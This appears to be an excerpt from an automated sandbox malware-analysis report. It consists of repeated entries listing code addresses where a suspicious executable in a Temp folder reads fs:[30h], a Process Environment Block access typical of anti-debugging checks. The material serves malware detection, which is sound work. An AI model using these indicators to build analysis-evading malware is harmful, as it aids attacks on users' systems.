Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 3_2_00AB52A5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 3_2_00AB52A5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 3_2_00AB52A5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 3_2_00AB52A5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 3_2_00AB52A5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h] 3_2_00ACAAB0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h] 3_2_00ACAAB0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEFAB0 mov eax, dword ptr fs:[00000030h] 3_2_00AEFAB0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h] 3_2_00AED294
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h] 3_2_00AED294
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2AE4 mov eax, dword ptr fs:[00000030h] 3_2_00AE2AE4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2ACB mov eax, dword ptr fs:[00000030h] 3_2_00AE2ACB
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h] 3_2_00AF4A2C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h] 3_2_00AF4A2C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h] 3_2_00B7AA16
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h] 3_2_00B7AA16
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC8A0A mov eax, dword ptr fs:[00000030h] 3_2_00AC8A0A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD3A1C mov eax, dword ptr fs:[00000030h] 3_2_00AD3A1C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h] 3_2_00AB5210
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB5210 mov ecx, dword ptr fs:[00000030h] 3_2_00AB5210
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h] 3_2_00AB5210
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h] 3_2_00AB5210
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h] 3_2_00ABAA16
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h] 3_2_00ABAA16
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF927A mov eax, dword ptr fs:[00000030h] 3_2_00AF927A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h] 3_2_00B6B260
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h] 3_2_00B6B260
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B88A62 mov eax, dword ptr fs:[00000030h] 3_2_00B88A62
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7EA55 mov eax, dword ptr fs:[00000030h] 3_2_00B7EA55
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B44257 mov eax, dword ptr fs:[00000030h] 3_2_00B44257
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h] 3_2_00AB9240
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h] 3_2_00AB9240
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h] 3_2_00AB9240
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h] 3_2_00AB9240
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h] 3_2_00AE4BAD
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h] 3_2_00AE4BAD
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h] 3_2_00AE4BAD
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B85BA5 mov eax, dword ptr fs:[00000030h] 3_2_00B85BA5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h] 3_2_00AC1B8F
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h] 3_2_00AC1B8F
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B6D380 mov ecx, dword ptr fs:[00000030h] 3_2_00B6D380
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2397 mov eax, dword ptr fs:[00000030h] 3_2_00AE2397
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7138A mov eax, dword ptr fs:[00000030h] 3_2_00B7138A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEB390 mov eax, dword ptr fs:[00000030h] 3_2_00AEB390
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADDBE9 mov eax, dword ptr fs:[00000030h] 3_2_00ADDBE9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 3_2_00AE03E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 3_2_00AE03E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 3_2_00AE03E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 3_2_00AE03E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 3_2_00AE03E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 3_2_00AE03E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h] 3_2_00B353CA
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h] 3_2_00B353CA
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7131B mov eax, dword ptr fs:[00000030h] 3_2_00B7131B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABDB60 mov ecx, dword ptr fs:[00000030h] 3_2_00ABDB60
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h] 3_2_00AE3B7A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h] 3_2_00AE3B7A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B88B58 mov eax, dword ptr fs:[00000030h] 3_2_00B88B58
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABDB40 mov eax, dword ptr fs:[00000030h] 3_2_00ABDB40
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABF358 mov eax, dword ptr fs:[00000030h] 3_2_00ABF358
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC849B mov eax, dword ptr fs:[00000030h] 3_2_00AC849B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h] 3_2_00B36CF0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h] 3_2_00B36CF0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h] 3_2_00B36CF0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B714FB mov eax, dword ptr fs:[00000030h] 3_2_00B714FB
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B88CD6 mov eax, dword ptr fs:[00000030h] 3_2_00B88CD6
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEBC2C mov eax, dword ptr fs:[00000030h] 3_2_00AEBC2C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h] 3_2_00B8740D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h] 3_2_00B8740D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h] 3_2_00B8740D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h] 3_2_00B36C0A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h] 3_2_00B36C0A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h] 3_2_00B36C0A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h] 3_2_00B36C0A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD746D mov eax, dword ptr fs:[00000030h] 3_2_00AD746D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h] 3_2_00B4C450
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h] 3_2_00B4C450
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEA44B mov eax, dword ptr fs:[00000030h] 3_2_00AEA44B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE35A1 mov eax, dword ptr fs:[00000030h] 3_2_00AE35A1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h] 3_2_00B805AC
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h] 3_2_00B805AC
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h] 3_2_00AE1DB5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h] 3_2_00AE1DB5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h] 3_2_00AE1DB5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 3_2_00AB2D8A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 3_2_00AB2D8A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 3_2_00AB2D8A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 3_2_00AB2D8A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 3_2_00AB2D8A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h] 3_2_00AE2581
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h] 3_2_00AE2581
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h] 3_2_00AE2581
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h] 3_2_00AE2581
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h] 3_2_00AEFD9B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h] 3_2_00AEFD9B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B68DF1 mov eax, dword ptr fs:[00000030h] 3_2_00B68DF1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h] 3_2_00ACD5E0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h] 3_2_00ACD5E0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00B7FDE2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00B7FDE2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00B7FDE2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00B7FDE2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B36DC9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B36DC9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B36DC9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00B36DC9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B36DC9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B36DC9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B3A537 mov eax, dword ptr fs:[00000030h] 3_2_00B3A537
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B88D34 mov eax, dword ptr fs:[00000030h] 3_2_00B88D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7E539 mov eax, dword ptr fs:[00000030h] 3_2_00B7E539
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h] 3_2_00AE4D3B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h] 3_2_00AE4D3B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h] 3_2_00AE4D3B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABAD30 mov eax, dword ptr fs:[00000030h] 3_2_00ABAD30
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h] 3_2_00ADC577
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h] 3_2_00ADC577
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF3D43 mov eax, dword ptr fs:[00000030h] 3_2_00AF3D43
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B33540 mov eax, dword ptr fs:[00000030h] 3_2_00B33540
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B63D40 mov eax, dword ptr fs:[00000030h] 3_2_00B63D40
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD7D50 mov eax, dword ptr fs:[00000030h] 3_2_00AD7D50
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B346A7 mov eax, dword ptr fs:[00000030h] 3_2_00B346A7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h] 3_2_00B80EA5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h] 3_2_00B80EA5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h] 3_2_00B80EA5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4FE87 mov eax, dword ptr fs:[00000030h] 3_2_00B4FE87
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE16E0 mov ecx, dword ptr fs:[00000030h] 3_2_00AE16E0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC76E2 mov eax, dword ptr fs:[00000030h] 3_2_00AC76E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE36CC mov eax, dword ptr fs:[00000030h] 3_2_00AE36CC
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF8EC7 mov eax, dword ptr fs:[00000030h] 3_2_00AF8EC7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B88ED6 mov eax, dword ptr fs:[00000030h] 3_2_00B88ED6
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B6FEC0 mov eax, dword ptr fs:[00000030h] 3_2_00B6FEC0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B6FE3F mov eax, dword ptr fs:[00000030h] 3_2_00B6FE3F
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABE620 mov eax, dword ptr fs:[00000030h] 3_2_00ABE620
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h] 3_2_00ABC600
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h] 3_2_00ABC600
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h] 3_2_00ABC600
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE8E00 mov eax, dword ptr fs:[00000030h] 3_2_00AE8E00
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h] 3_2_00AEA61C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h] 3_2_00AEA61C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71608 mov eax, dword ptr fs:[00000030h] 3_2_00B71608
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC766D mov eax, dword ptr fs:[00000030h] 3_2_00AC766D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE73
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE73
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE73
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE73
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE73
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 3_2_00AC7E41
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 3_2_00AC7E41
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 3_2_00AC7E41
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 3_2_00AC7E41
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 3_2_00AC7E41
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 3_2_00AC7E41
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h] 3_2_00B7AE44
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h] 3_2_00B7AE44
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h] 3_2_00B37794
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h] 3_2_00B37794
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h] 3_2_00B37794
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC8794 mov eax, dword ptr fs:[00000030h] 3_2_00AC8794
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF37F5 mov eax, dword ptr fs:[00000030h] 3_2_00AF37F5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h] 3_2_00AB4F2E
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h] 3_2_00AB4F2E
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEE730 mov eax, dword ptr fs:[00000030h] 3_2_00AEE730
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h] 3_2_00AEA70E
